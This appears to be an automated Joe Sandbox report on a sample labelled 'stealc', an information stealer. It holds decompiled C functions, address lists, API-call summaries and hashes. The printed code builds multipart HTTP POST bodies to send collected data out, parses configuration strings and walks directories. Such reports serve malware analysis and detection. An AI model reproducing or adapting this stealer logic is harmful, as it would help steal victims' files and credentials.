              				void* _t327;
              				void* _t330;
              				void* _t337;
              				signed int _t342;
              				void* _t350;
              				void* _t353;
              				signed int _t354;
              				signed int _t356;
              				void* _t358;
              				long _t441;
              				void* _t444;
              				void* _t445;
              				void* _t446;
              				void* _t448;
              
              				_t452 = __eflags;
              				_t446 = _t445 - 0xc;
              				E0017E9C2( &_a8, __ecx, _t446, __eflags);
              				_t168 = E001730F8();
              				_t356 = 0xf;
              				memcpy( &_v168, _t168, _t356 << 2);
              				_t448 = _t446 + 0x1c;
              				E0017E990(_a4, _t452, 0x17fbd9);
              				E0017E990( &_v84, _t452, 0x17fbd9);
              				E0017E990( &_v16, _t452, 0x17fbd9);
              				E0017E990( &_v68, _t452, 0x17fbd9);
              				E0017E990( &_v96, _t452, 0x17fbd9);
              				_t175 =  *0x383694(0, 1, 0, 0, 0,  &_v428);
              				_push( *0x3833a4);
              				_v72 = _t175;
              				_push(_v164);
              				_v32 = 0;
              				if( *0x383754() == 0) {
              					_v32 = 1;
              				}
              				_t454 = _v72;
              				if(_v72 != 0) {
              					_t204 = E0017D78F(_t350,  &_v56, _t454, 0x14);
              					_pop(0);
              					E0017EA2F(E0017EA69( &_v84, 0, _t204,  &_v108, _t454), 0,  &_v84);
              					E00171839(_v108);
              					E00171839(_v56);
              					_t352 = "\r\n";
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "------"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EA69( &_v68, 0,  &_v84,  &_v56, _t454), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "--"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EA69(E0017EAAB( &_v96, 0,  &_v28, _t454,  *0x38306c), 0,  &_v84,  &_v108, _t454), 0,  &_v96);
              					E00171839(_v108);
              					E00171839(_v28);
              					_t245 =  *0x383778(_v72, _v152, _v144, 0, 0, 3, 0, 0);
              					_v36 = _t245;
              					if(_t245 != 0) {
              						asm("sbb eax, eax");
              						_t250 =  *0x3837a8(_v36,  *0x3833c0, _v124,  *0x3831f8, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0);
              						_v32 = _t250;
              						_t456 = _t250;
              						if(_t250 != 0) {
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t456,  *0x38322c), 0,  &_v16);
              							E00171839(_v56);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456,  *0x383398), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_a20,  &_v28, _t456), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t456,  *0x38322c), 0,  &_v16);
              							E00171839(_v56);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456,  *0x383050), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_a88,  &_v28, _t456), 0,  &_v16);
              							E00171839(_v28);
              							_t327 =  *0x383658(_v68);
              							_t441 = _t327 +  *0x383658(_v16);
              							_t330 = RtlAllocateHeap(GetProcessHeap(), 0, _t441);
              							_t353 = _t330;
              							memcpy(_t353, _v16,  *0x383658(_v16));
              							memcpy(_t353 +  *0x383658( *0x383658(_v68)), _v16, _v68);
              							_t448 = _t448 + 0x18;
              							_t337 =  *0x383658(_v96, _t353, _t441);
              							_t354 = _v32;
              							 *0x383748(_t354, _v96, _t337);
              							while(1) {
              								_push( &_v32);
              								_push(0xc7);
              								_push( &_v368);
              								_push(_t354);
              								if( *0x3836b8() == 0) {
              									break;
              								}
              								_t342 = _v32;
              								__eflags = _t342;
              								if(__eflags != 0) {
              									 *((char*)(_t444 + _t342 - 0x16c)) = 0;
              									E0017EA2F(E0017EAAB(_a4, 0,  &_v108, __eflags,  &_v368), 0, _a4);
              									E00171839(_v108);
              									continue;
              								}
              								break;
              							}
              							 *0x383690(_t354);
              						}
              						 *0x383690(_v36);
              					}
              				}
              				 *0x383690(_v72);
              				_t179 = E00174C21( &_v40, 0,  &_v44,  *_a4);
              				_pop(_t358);
              				_t458 = _t179;
              				if(_t179 != 0) {
              					E0017E9EB(_t358, _a4, 0x17fbd9);
              					E0017EA2F(E0017EAAB(_a4, _t358,  &_v28, _t458, _v40), _t358, _a4);
              					E00171839(_v28);
              				}
              				_v36 =  &_v40;
              				memset(_v36, 0, 4 << 0);
              				_v36 =  &_v44;
              				memset(_v36, 0, 4 << 0);
              				E00171839(_v96);
              				E00171839(_v68);
              				E00171839(_v16);
              				E00171839(_v84);
              				E001716AC( &_a8);
              				E00171839(_a88);
              				return _a4;
              			}













































              0x00173d9b
              0x00173da7
              0x00173daf
              0x00173dbb
              0x00173dc5
              0x00173dce
              0x00173dce
              0x00173dd9
              0x00173de2
              0x00173deb
              0x00173df4
              0x00173dfd
              0x00173e0c
              0x00173e12
              0x00173e18
              0x00173e1b
              0x00173e21
              0x00173e2c
              0x00173e2e
              0x00173e2e
              0x00173e31
              0x00173e34
              0x00173e3f
              0x00173e46
              0x00173e55
              0x00173e5d
              0x00173e65
              0x00173e6a
              0x00173e7e
              0x00173e86
              0x00173e9e
              0x00173ea6
              0x00173ebc
              0x00173ec4
              0x00173edc
              0x00173ee4
              0x00173ef8
              0x00173f00
              0x00173f21
              0x00173f29
              0x00173f31
              0x00173f4d
              0x00173f53
              0x00173f58
              0x00173f64
              0x00173f85
              0x00173f8b
              0x00173f8e
              0x00173f90
              0x00173fa9
              0x00173fb1
              0x00173fc4
              0x00173fcc
              0x00173fe0
              0x00173fe8
              0x00174001
              0x00174009
              0x00174022
              0x0017402a
              0x00174042
              0x0017404a
              0x00174060
              0x00174068
              0x0017407c
              0x00174084
              0x0017409c
              0x001740a4
              0x001740ba
              0x001740c2
              0x001740d6
              0x001740de
              0x001740f7
              0x001740ff
              0x00174118
              0x00174120
              0x00174138
              0x00174140
              0x00174156
              0x0017415e
              0x00174166
              0x00174177
              0x00174183
              0x0017418c
              0x0017419f
              0x001741bd
              0x001741bf
              0x001741c7
              0x001741cd
              0x001741d5
              0x00174213
              0x00174216
              0x00174217
              0x0017421e
              0x0017421f
              0x00174228
              0x00000000
              0x00000000
              0x001741e2
              0x001741e5
              0x001741e7
              0x001741e9
              0x00174206
              0x0017420e
              0x00000000
              0x0017420e
              0x00000000
              0x001741e7
              0x0017422b
              0x0017422b
              0x00174234
              0x00174234
              0x00173f58
              0x0017423d
              0x0017424e
              0x00174253
              0x00174254
              0x00174256
              0x00174260
              0x00174276
              0x0017427e
              0x0017427e
              0x00174286
              0x00174293
              0x00174298
              0x001742a5
              0x001742aa
              0x001742b2
              0x001742ba
              0x001742c2
              0x001742ca
              0x001742d2
              0x001742de

              APIs
                • Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 0017312A
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 00173130
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 00173136
                • Part of subcall function 001730F8: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
                • Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
                • Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2
                • Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F
                • Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
                • Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1
              • lstrlen.KERNEL32(?,",00181E44,------,00181E44,",00181E44,------), ref: 00174166
              • lstrlen.KERNEL32(?), ref: 00174171
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0017417C
              • RtlAllocateHeap.NTDLL(00000000), ref: 00174183
              • lstrlen.KERNEL32(?), ref: 0017418E
              • memcpy.MSVCRT ref: 0017419F
              • lstrlen.KERNEL32(?), ref: 001741A7
              • lstrlen.KERNEL32(?,?,00000000), ref: 001741B4
              • memcpy.MSVCRT ref: 001741BD
              • lstrlen.KERNEL32(?,00000000,00000000), ref: 001741C7
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrlen$lstrcpy$malloc$Heaplstrcatmemcpy$AllocateProcess
              • String ID: "$------
              • API String ID: 2463768155-2370822465
              • Opcode ID: 74b0ca48f641d40bb88c5f19df68356e041ff15b36b7fd01d178647d379ebc11
              • Instruction ID: 072b4c20721a5df0bb13cd7d1962343d9376159efe37d7ae6078fcc1e33f2a99
              • Opcode Fuzzy Hash: 74b0ca48f641d40bb88c5f19df68356e041ff15b36b7fd01d178647d379ebc11
              • Instruction Fuzzy Hash: 01F19736D0012AABCF01EFA4EC469DDBBB9BF58704F5580A0F919B7161D7306E5ACB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 52%
              			E00178E1F(void* __ebx, void* __esi, intOrPtr _a4, signed int _a16) {
              				char _v8;
              				char _v12;
              				void* _v16;
              				signed int _v20;
              				char _v32;
              				char _v44;
              				char _v56;
              				char _v68;
              				char _v80;
              				char _v92;
              				char _v104;
              				char _v116;
              				char _v376;
              				char _v636;
              				short _t89;
              				intOrPtr* _t91;
              				void* _t101;
              				char* _t104;
              				void* _t105;
              				void* _t173;
              				void* _t181;
              				void* _t184;
              				intOrPtr _t185;
              				void* _t189;
              				signed int _t195;
              				void* _t197;
              				signed int _t206;
              				intOrPtr* _t209;
              				intOrPtr _t225;
              				intOrPtr _t226;
              				void* _t227;
              				void* _t230;
              
              				_t197 = __ebx;
              				_t89 = 0x7c;
              				_v8 = _t89;
              				_t91 =  &_v8;
              				_v20 = 1;
              				__imp__strtok_s(_a4, _t91,  &_v12);
              				_t209 = _t91;
              				_v16 =  &_v636;
              				memset(_v16, 0, 0x104 << 0);
              				_v16 =  &_v376;
              				memset(_v16, 0, 0x104 << 0);
              				_t230 = _t227 + 0x24;
              				_t201 = 0;
              				if(_t209 == 0) {
              					L25:
              					return E00171839(_a4);
              				} else {
              					do {
              						_t101 = _v20 - 1;
              						if(_t101 == 0) {
              							_t223 =  *(_t197 + 0xc) * 0x30 + _a16;
              							L21:
              							_push(_t209);
              							L22:
              							E0017E9EB(_t201, _t223);
              							goto L23;
              						}
              						_t105 = _t101 - 1;
              						if(_t105 == 0) {
              							_v16 =  &_v636;
              							memset(_v16, 0, 0x104 << 0);
              							_v16 =  &_v376;
              							memset(_v16, 0, 0x104 << 0);
              							 *0x3837b8( &_v636, _t209);
              							 *0x3837b8( &_v376, E0017DBC6( &_v636,  *0x383338,  *((intOrPtr*)(E0017D8C9( &_v104, 0x10)))));
              							E00171839(_v104);
              							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x3833b8,  *((intOrPtr*)(E0017D8C9( &_v56, 0x1a)))));
              							E00171839(_v56);
              							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383384,  *((intOrPtr*)(E0017D8C9( &_v32, 0x1c)))));
              							E00171839(_v32);
              							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383200,  *((intOrPtr*)(E0017D8C9( &_v80, 0x28)))));
              							E00171839(_v80);
              							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383210,  *((intOrPtr*)(E0017D8C9( &_v116, 5)))));
              							E00171839(_v116);
              							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383070,  *((intOrPtr*)(E0017D8C9( &_v44, 0x26)))));
              							E00171839(_v44);
              							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383450,  *((intOrPtr*)(E0017D8C9( &_v68, 0x2a)))));
              							E00171839(_v68);
              							_t173 = E0017DBC6( &_v376,  *0x383270,  *((intOrPtr*)(E0017D8C9( &_v92, 8))));
              							_t230 = _t230 + 0x78;
              							 *0x3837b8( &_v376, _t173);
              							E00171839(_v92);
              							_t201 = _a16;
              							_push( &_v376);
              							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0xc;
              							goto L22;
              						}
              						_t181 = _t105 - 1;
              						if(_t181 == 0) {
              							_t201 = _a16;
              							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0x18;
              							goto L21;
              						}
              						_t184 = _t181 - 1;
              						if(_t184 == 0) {
              							_t206 = 0;
              							while(1) {
              								_t185 =  *_t209;
              								if(_t185 == 0) {
              									break;
              								}
              								_t206 = _t206 * 0xa + _t185 - 0x30;
              								_t209 = _t209 + 1;
              							}
              							 *( *(_t197 + 0xc) * 0x30 + _a16 + 0x24) = _t206;
              							goto L23;
              						}
              						_t189 = _t184 - 1;
              						if(_t189 == 0) {
              							_push("1");
              							_push(_t209);
              							_t225 = 0;
              							if( *0x383754() == 0) {
              								_t225 = 1;
              							}
              							_t201 = _a16;
              							 *((intOrPtr*)( *(_t197 + 0xc) * 0x30 + _a16 + 0x28)) = _t225;
              						} else {
              							if(_t189 == 1) {
              								_push("1");
              								_push(_t209);
              								_t226 = 0;
              								if( *0x383754() == 0) {
              									_t226 = 1;
              								}
              								_t195 =  *(_t197 + 0xc);
              								_v20 = _v20 & 0x00000000;
              								_t201 = _t195 * 0x30;
              								 *((intOrPtr*)(_t195 * 0x30 + _a16 + 0x2c)) = _t226;
              								 *(_t197 + 0xc) = _t195 + 1;
              							}
              						}
              						L23:
              						_t104 =  &_v8;
              						__imp__strtok_s(0, _t104,  &_v12);
              						_t230 = _t230 + 0xc;
              						_v20 = _v20 + 1;
              						_t209 = _t104;
              					} while (_t209 != 0);
              					goto L25;
              				}
              			}



































              0x00178e1f
              0x00178e2b
              0x00178e2c
              0x00178e34
              0x00178e3b
              0x00178e42
              0x00178e48
              0x00178e53
              0x00178e60
              0x00178e68
              0x00178e75
              0x00178e75
              0x00178e75
              0x00178e79
              0x00179160
              0x0017916a
              0x00178e7f
              0x00178e80
              0x00178e83
              0x00178e84
              0x00179136
              0x00179139
              0x00179139
              0x0017913a
              0x0017913a
              0x00000000
              0x0017913a
              0x00178e8a
              0x00178e8b
              0x00178f38
              0x00178f45
              0x00178f4d
              0x00178f5a
              0x00178f64
              0x00178f92
              0x00178f9b
              0x00178fc8
              0x00178fd1
              0x00178ffe
              0x00179007
              0x00179034
              0x0017903d
              0x0017906a
              0x00179073
              0x001790a0
              0x001790a9
              0x001790d6
              0x001790df
              0x001790fc
              0x00179101
              0x0017910c
              0x00179115
              0x0017911a
              0x00179123
              0x0017912a
              0x00000000
              0x0017912a
              0x00178e91
              0x00178e92
              0x00178f23
              0x00178f29
              0x00000000
              0x00178f29
              0x00178e98
              0x00178e99
              0x00178ef9
              0x00178f08
              0x00178f08
              0x00178f0c
              0x00000000
              0x00000000
              0x00178f03
              0x00178f07
              0x00178f07
              0x00178f17
              0x00000000
              0x00178f17
              0x00178e9b
              0x00178e9c
              0x00178ed4
              0x00178ed9
              0x00178eda
              0x00178ee4
              0x00178ee6
              0x00178ee6
              0x00178eea
              0x00178ef0
              0x00178e9e
              0x00178e9f
              0x00178ea5
              0x00178eaa
              0x00178eab
              0x00178eb5
              0x00178eb7
              0x00178eb7
              0x00178eb8
              0x00178ebb
              0x00178ec4
              0x00178ec8
              0x00178ecc
              0x00178ecc
              0x00178e9f
              0x0017913f
              0x00179143
              0x00179149
              0x0017914f
              0x00179152
              0x00179155
              0x00179157
              0x00000000
              0x0017915f

              APIs
              • strtok_s.MSVCRT ref: 00178E42
              • lstrcpy.KERNEL32(?,00000000), ref: 00178F64
              • lstrcpy.KERNEL32(?,00000000), ref: 00178F92
              • lstrcpy.KERNEL32(?,00000000), ref: 00178FC8
              • lstrcpy.KERNEL32(?,00000000), ref: 00178FFE
              • lstrcpy.KERNEL32(?,00000000), ref: 00179034
              • lstrcpy.KERNEL32(?,00000000), ref: 0017906A
              • lstrcpy.KERNEL32(?,00000000), ref: 001790A0
                • Part of subcall function 0017DBC6: lstrlen.KERNEL32(00000010,?,?,?,00178F87,00000000,00000010), ref: 0017DBFC
              • lstrcpy.KERNEL32(?,00000000), ref: 001790D6
              • lstrcpy.KERNEL32(?,00000000), ref: 0017910C
              • strtok_s.MSVCRT ref: 00179149
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcpy$strtok_s$lstrlen
              • String ID:
              • API String ID: 2116072422-0
              • Opcode ID: 73fb1e313353f40e4dfe45839b3c5abea17c1b4a8a715c0cb3296a560b159133
              • Instruction ID: efe892230fdba8444d3cebffb23908c60fc9236805f28b3f80c995534b533090
              • Opcode Fuzzy Hash: 73fb1e313353f40e4dfe45839b3c5abea17c1b4a8a715c0cb3296a560b159133
              • Instruction Fuzzy Hash: 6AA14776900219ABDF01EF64DC49ACEB7BCFF18700F4481A6E90DE7261EB319A598F51
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrcat.KERNEL32(000000FF,?), ref: 0017B916
              • lstrcat.KERNEL32(000000FF,00181F64), ref: 0017B924
              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0017B955
              • RtlAllocateHeap.NTDLL(00000000), ref: 0017B95C
              • lstrcpy.KERNEL32(?,0017FBD9), ref: 0017B9B7
              • GetProcessHeap.KERNEL32(00000000,0017FBD9), ref: 0017B9BF
              • lstrcat.KERNEL32(000000FF,?), ref: 0017B9D6
              • lstrcpy.KERNEL32(?,0017FBD9), ref: 0017B9E8
              • lstrcat.KERNEL32(000000FF,?), ref: 0017BA10
              • lstrcat.KERNEL32(000000FF,00181EBC), ref: 0017BA1E
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$Heap$Processlstrcpy$Allocate
              • String ID:
              • API String ID: 2428395069-0
              • Opcode ID: a6e273245f89e71d9226b4403263926882155b9031ccabad0fc1cb0dcbdc0a54
              • Instruction ID: 35674dd5f8ba3c3a1d5987655eb1a3ab9561529344166238cca528b1b5818bf4
              • Opcode Fuzzy Hash: a6e273245f89e71d9226b4403263926882155b9031ccabad0fc1cb0dcbdc0a54
              • Instruction Fuzzy Hash: 125195F2900219BFDB129FA4DD88EEE7BBCEB48745F0044A5F606E2160D7359B459BA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0017B102
              • RtlAllocateHeap.NTDLL(00000000), ref: 0017B109
              • lstrcat.KERNEL32(?), ref: 0017B207
              • lstrcat.KERNEL32(?), ref: 0017B21A
              • lstrlen.KERNEL32(0017B3E2), ref: 0017B223
              • lstrlen.KERNEL32(0017B3E2), ref: 0017B230
                • Part of subcall function 0017AEC6: memset.MSVCRT ref: 0017AEE8
                • Part of subcall function 0017AEC6: memset.MSVCRT ref: 0017AEF6
                • Part of subcall function 0017AEC6: lstrcat.KERNEL32(?,00000000), ref: 0017AF15
                • Part of subcall function 0017AEC6: lstrcat.KERNEL32(?), ref: 0017AF30
                • Part of subcall function 0017AEC6: lstrcat.KERNEL32(?,?), ref: 0017AF44
                • Part of subcall function 0017AEC6: lstrcat.KERNEL32(?), ref: 0017AF57
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$Heaplstrlenmemset$AllocateProcess
              • String ID: %s\%s$%s\*
              • API String ID: 949609408-2848263008
              • Opcode ID: efc9e6106e8191355f62eb12250d10e056b6cb7c7950d71d1d46bbf604c335b3
              • Instruction ID: d83b96d2b1c5859efc0531eae012e12846ec3b6b2f3a67fb303436511e2f3460
              • Opcode Fuzzy Hash: efc9e6106e8191355f62eb12250d10e056b6cb7c7950d71d1d46bbf604c335b3
              • Instruction Fuzzy Hash: C641FCB1900219BBCF11ABA4DC49ADEBBBCEF48705F0445E1F619E3260EB359B558F50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrcat.KERNEL32(?,?), ref: 0017A7E6
              • lstrcat.KERNEL32(?,?), ref: 0017A8B8
              • lstrlen.KERNEL32(?), ref: 0017A8C5
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0017A95F
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$Unothrow_t@std@@@__ehfuncinfo$??2@lstrlen
              • String ID: %s\%s$%s\%s\%s$%s\*
              • API String ID: 745573756-1426491737
              • Opcode ID: 0750a5a7b6532ee65deafb5ac03086b3dd8f1723ce21e1a02370c4848ccad2ce
              • Instruction ID: 0686d5f22dcc0152b4441b3047f62d6d09f8594209c90344e0d46db04c9024d7
              • Opcode Fuzzy Hash: 0750a5a7b6532ee65deafb5ac03086b3dd8f1723ce21e1a02370c4848ccad2ce
              • Instruction Fuzzy Hash: 298117B290021DABCF11AFA4CD88ADE7BBCAF08314F4444A5F909A3250EB35DB95CF51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 42%
              			E0017AEC6(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
              				char _v8;
              				char _v12;
              				char _v16;
              				void* _v20;
              				char _v24;
              				void* _v28;
              				char _v40;
              				void _v308;
              				void _v572;
              				char _v1572;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t66;
              				void* _t80;
              				void* _t94;
              				void* _t96;
              				void* _t98;
              				char _t99;
              				char _t101;
              				intOrPtr* _t108;
              				void* _t125;
              				void* _t132;
              				void* _t156;
              				void* _t157;
              				void* _t160;
              				void* _t161;
              				void* _t165;
              				void* _t167;
              				void* _t168;
              
              				_t168 = __eflags;
              				memset( &_v572, 0, 0x104);
              				memset( &_v308, 0, 0x104);
              				_v12 = 0;
              				_v16 = 0;
              				_t66 = E0017D8C9( &_v40, 0x1a);
              				_pop(_t125);
              				 *0x383730( &_v572,  *_t66);
              				E00171839(_v40);
              				 *0x383730( &_v572,  *0x383248);
              				 *0x383730( &_v308,  &_v572);
              				 *0x383730( *0x3834d8);
              				_t160 = _t157 + 0x18 - 0xc;
              				E0017E990(_t160, _t168,  &_v308);
              				_t80 = E0017D89F( &_v308);
              				_t161 = _t160 + 0xc;
              				_t169 = _t80;
              				if(_t80 != 0) {
              					_t94 = E00174D0F(_t169,  &_v308,  &_v12,  &_v16);
              					_t161 = _t161 + 0xc;
              					_t170 = _t94;
              					if(_t94 != 0) {
              						_t165 = _t161 - 0xc;
              						E0017E990(_t165, _t170, _a4);
              						_t96 = E00174B85( &_v24,  &_v28);
              						_t161 = _t165 + 0xc;
              						if(_t96 != 0) {
              							_t98 = E0017DC73(_v28, _t125, _v24);
              							_pop(_t132);
              							_t156 = _t98;
              							_t99 =  *0x3835f4(_t156,  *0x383040);
              							_v8 = _t99;
              							if(_t99 != 0) {
              								_t101 = _t99 + 0xc;
              								_v8 = _t101;
              								 *((char*)(_t101 + 0x8c)) = 0;
              								if(E00174C21( &_v20, _t132,  &_v24, _v8) != 0) {
              									_v28 =  &_v1572;
              									memset(_v28, 0, 0x3e8 << 0);
              									_t108 = E00174E50(_v24,  &_v40, _v20, _v12, _v16);
              									_t167 = _t161 + 0x1c;
              									 *0x383730( &_v1572,  *_t108);
              									E00171839(_v40);
              									_push(0x17fbd9);
              									_push( &_v1572);
              									if( *0x383754() != 0) {
              										_push( &_v1572);
              									} else {
              										_push(_v8);
              									}
              									 *0x383730(_a8);
              									 *0x383730(_a8, "\n");
              									_v20 =  &_v1572;
              									memset(_v20, 0, 0x3e8 << 0);
              									_t161 = _t167 + 0xc;
              								}
              							}
              							 *0x383774(_t156);
              						}
              					}
              				}
              				E00174C7A( &_v16,  &_v12);
              				_v20 =  &_v572;
              				memset(_v20, 0, 0x104 << 0);
              				_v20 =  &_v308;
              				memset(_v20, 0, 0x104 << 0);
              				_v20 =  &_v8;
              				return memset(_v20, 0, 4 << 0);
              			}

































              0x0017aec6
              0x0017aee8
              0x0017aef6
              0x0017af00
              0x0017af03
              0x0017af06
              0x0017af0b
              0x0017af15
              0x0017af1e
              0x0017af30
              0x0017af44
              0x0017af57
              0x0017af5d
              0x0017af69
              0x0017af6e
              0x0017af73
              0x0017af76
              0x0017af78
              0x0017af8d
              0x0017af92
              0x0017af95
              0x0017af97
              0x0017af9d
              0x0017afa5
              0x0017afb0
              0x0017afb5
              0x0017afba
              0x0017afc6
              0x0017afcb
              0x0017afd2
              0x0017afd5
              0x0017afdb
              0x0017afe0
              0x0017afe6
              0x0017afe9
              0x0017afec
              0x0017b004
              0x0017b010
              0x0017b01d
              0x0017b02f
              0x0017b034
              0x0017b040
              0x0017b049
              0x0017b04e
              0x0017b059
              0x0017b062
              0x0017b06f
              0x0017b064
              0x0017b064
              0x0017b064
              0x0017b073
              0x0017b081
              0x0017b08d
              0x0017b09a
              0x0017b09a
              0x0017b09a
              0x0017b004
              0x0017b09d
              0x0017b09d
              0x0017afba
              0x0017af97
              0x0017b0a9
              0x0017b0b4
              0x0017b0c1
              0x0017b0c9
              0x0017b0d6
              0x0017b0db
              0x0017b0ee

              APIs
              • memset.MSVCRT ref: 0017AEE8
